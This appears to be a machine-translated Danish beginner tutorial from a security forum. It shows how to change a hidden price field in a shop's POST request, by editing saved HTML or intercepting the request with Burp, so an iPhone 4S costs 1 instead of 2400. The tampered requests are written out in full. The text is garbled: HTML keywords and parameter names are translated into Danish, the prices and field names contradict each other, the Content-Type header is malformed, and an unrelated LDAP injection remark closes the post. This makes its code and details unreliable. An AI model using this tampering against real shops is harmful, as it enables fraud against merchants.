Intrusion Penetration: Anvendelse af HTTP-headers

Admin · Opslået på 07/02/2015 17.59.07

Om anvendelsen af HTTP-headere

HTTP-header bruges ofte i transmissionsmekanismen på hjemmesider, men de fleste begyndere i Kina har ikke bemærket denne del. Denne artikel er kun dedikeret til begyndere, http-headerens rolle i indtrængningsprocessen.

Tag shopping-siden som eksempel for at analysere en lille del af HTTP-headers rolle.

Lad os først analysere en formular på shoppingsiden.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br /> 

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<inputtype="skjult" navn="pris" værdi="449">

<inputtype="indsend" værdi="Køb">

</form>

Under åbningsprocessen tager du et screenshot af hans http-beskedheader og kigger

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Selvom prisfeltet ikke vises på siden, når man åbner shoppingsiden, kan det stadig redigeres og betjenes af brugeren.

Der er to måder at opnå redigering på

1. Gem HTML-kildekoden til modifikation, og indlæs den derefter i browseren for at køre den

2. Brug proxy-aflytning til at ændre HTTP-headere (proxy-konstruktion i tool burp)

Tag HTTP-headeren ovenfor som eksempel
Før ændringen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Efter ændringen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

Mængde=1&Pris=1

I den sidste linje har feltet Price en værdi på 2400, og hvis vi ændrer det til 1, kan vi få iPhone 4S til en billigere pris.

Denne artikel giver kun en idé om uventede gevinster som LDAP-injektion.

[Sikkerhedsvejledning] Intrusion Penetration: Anvendelse af HTTP-headers

Relaterede indlæg

Afsnit set